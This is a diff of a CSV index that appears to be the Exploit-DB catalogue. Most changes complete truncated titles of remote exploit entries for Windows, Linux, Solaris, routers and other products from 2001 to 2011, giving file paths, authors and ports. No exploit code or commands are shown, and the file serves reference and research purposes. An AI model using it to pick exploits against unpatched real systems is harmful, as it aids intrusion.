+6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote Command Execution",2008-08-29,Andi,solaris,remote,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files",2008-08-30,spdr,windows,remote,0 6355,platforms/windows/remote/6355.txt,"Google Chrome 0.2.149.27 - Automatic File Download",2008-09-03,nerex,windows,remote,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote,0 @@ -10358,14 +10370,14 @@ id,file,description,date,author,platform,type,port 6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 6476,platforms/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll'",2008-09-19,Nine:Situations:Group,windows,remote,0 +6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution",2008-09-19,Nine:Situations:Group,windows,remote,0 6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 6532,platforms/hardware/remote/6532.py,"Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery",2008-09-22,Zigma,hardware,remote,0 6537,platforms/windows/remote/6537.html,"Chilkat XML - ActiveX Arbitrary File Creation/Execution",2008-09-23,shinnai,windows,remote,0 6548,platforms/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service",2008-09-27,e.wiZz!,windows,remote,0 -6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote",2008-09-30,Nine:Situations:Group,windows,remote,0 +6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Code Execution",2008-09-30,Nine:Situations:Group,windows,remote,0 6638,platforms/windows/remote/6638.html,"GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec",2008-09-30,EgiX,windows,remote,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 @@ -10527,7 +10539,7 @@ id,file,description,date,author,platform,type,port 8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - Directory Traversal / File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow",2009-04-27,His0k4,windows,remote,80 -8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow",2009-04-28,sgrakkyu,linux,remote,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow",2009-04-29,Nine:Situations:Group,windows,remote,0 @@ -10587,7 +10599,7 @@ id,file,description,date,author,platform,type,port 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)",2009-07-20,netsoul,windows,remote,0 -9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11'",2009-07-21,"Ahmed Obied",windows,remote,0 +9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow",2009-07-21,"Ahmed Obied",windows,remote,0 9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 9303,platforms/windows/remote/9303.c,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",windows,remote,0 @@ -10631,13 +10643,11 @@ id,file,description,date,author,platform,type,port 9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal",2009-09-18,Stack,multiple,remote,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - 'iim://' URI handler",2009-09-29,bruiser,windows,remote,0 -9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote",2009-09-29,pyrokinesis,windows,remote,0 +9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow",2009-09-29,pyrokinesis,windows,remote,0 9805,platforms/windows/remote/9805.html,"Oracle - Document Capture BlackIce DEVMODE",2009-09-29,pyrokinesis,windows,remote,0 9810,platforms/windows/remote/9810.txt,"EnjoySAP 6.4/7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 -9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 9816,platforms/windows/remote/9816.py,"VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 -9817,platforms/windows/remote/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9843,platforms/multiple/remote/9843.txt,"Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (1)",2009-11-03,corelanc0d3r,windows,remote,0 @@ -10668,7 +10678,7 @@ id,file,description,date,author,platform,type,port 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 -9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 +9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 @@ -10710,7 +10720,7 @@ id,file,description,date,author,platform,type,port 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 -10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 +10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515 10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515 10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 @@ -10753,9 +10763,9 @@ id,file,description,date,author,platform,type,port 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Overflow (SEH)",2009-12-29,Lincoln,windows,remote,6660 +10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Remote Overflow (SEH)",2009-12-29,Lincoln,windows,remote,6660 10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities",2009-12-30,emgent,windows,remote,80 -10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Overflow (SEH)",2010-01-02,Lincoln,windows,remote,0 +10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,windows,remote,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0 10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,linux,remote,0 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",novell,remote,0 @@ -10775,7 +10785,7 @@ id,file,description,date,author,platform,type,port 11272,platforms/windows/remote/11272.py,"CamShot 1.2 - Overwrite (SEH)",2010-01-27,tecnik,windows,remote,0 11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow",2010-01-30,Dz_attacker,windows,remote,0 11328,platforms/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 -11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote",2010-02-12,Lincoln,windows,remote,0 +11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow",2010-02-12,Lincoln,windows,remote,0 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",windows,remote,0 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add)",2010-02-15,"Sioma Labs",windows,remote,0 @@ -10831,7 +10841,7 @@ id,file,description,date,author,platform,type,port 12312,platforms/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12331,platforms/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 -12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote",2010-04-22,zombiefx,windows,remote,0 +12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote Overflow",2010-04-22,zombiefx,windows,remote,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method",2010-04-24,"ThE g0bL!N",windows,remote,0 12380,platforms/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 @@ -10864,7 +10874,7 @@ id,file,description,date,author,platform,type,port 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte",2010-06-13,kingcope,multiple,remote,80 13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute",2010-06-13,anonymous,linux,remote,0 -13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Overflow (SEH)",2010-06-17,b0nd,windows,remote,0 +13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Remote Overflow (SEH)",2010-06-17,b0nd,windows,remote,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 @@ -10874,17 +10884,17 @@ id,file,description,date,author,platform,type,port 14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote",2010-07-03,dmc,windows,remote,0 +14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow",2010-07-04,blake,windows,remote,0 14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 (Windows 7) - Buffer Overflow (ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String",2010-07-06,l3D,windows,remote,0 -14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow",2010-07-06,d1dn0t,osx,remote,0 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Code Execution",2010-07-08,webDEViL,windows,remote,0 -14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Overflow (DEP Bypass)",2010-07-09,dmc,windows,remote,0 +14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass)",2010-07-09,dmc,windows,remote,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14385,platforms/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking",2010-07-17,"Pouya Daneshmand",windows,remote,0 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 @@ -10915,7 +10925,7 @@ id,file,description,date,author,platform,type,port 14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray",2010-08-08,"ThE g0bL!N",windows,remote,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - 'FileExists' ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 -14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote",2010-08-10,sud0,windows,remote,0 +14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Command Execution",2010-08-10,sud0,windows,remote,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray",2010-08-10,Madjix,windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow",2010-08-10,"Rabih Mohsen",windows,remote,0 @@ -10930,7 +10940,7 @@ id,file,description,date,author,platform,type,port 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14886,platforms/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)",2010-09-03,Abysssec,windows,remote,0 -14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote",2010-11-17,Dr_IDE,windows,remote,0 +14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction",2010-11-17,Dr_IDE,windows,remote,0 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0 14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0 14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80 @@ -10966,7 +10976,7 @@ id,file,description,date,author,platform,type,port 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 -15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild'",2010-10-29,anonymous,windows,remote,0 +15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow",2010-10-29,anonymous,windows,remote,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 @@ -11013,8 +11023,8 @@ id,file,description,date,author,platform,type,port 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 -15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 -16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote",2011-01-19,Dr_IDE,windows,remote,0 +15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 +16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,windows,remote,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",windows,remote,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,multiple,remote,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 @@ -11091,11 +11101,11 @@ id,file,description,date,author,platform,type,port 16327,platforms/solaris/remote/16327.rb,"Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (2) (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0 -16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0 -16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 +16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0 +16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Remote Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote,0 -16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -11125,13 +11135,13 @@ id,file,description,date,author,platform,type,port 16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)",2011-02-17,Metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)",2011-01-21,Metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 +16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,windows,remote,0 @@ -11161,9 +11171,9 @@ id,file,description,date,author,platform,type,port 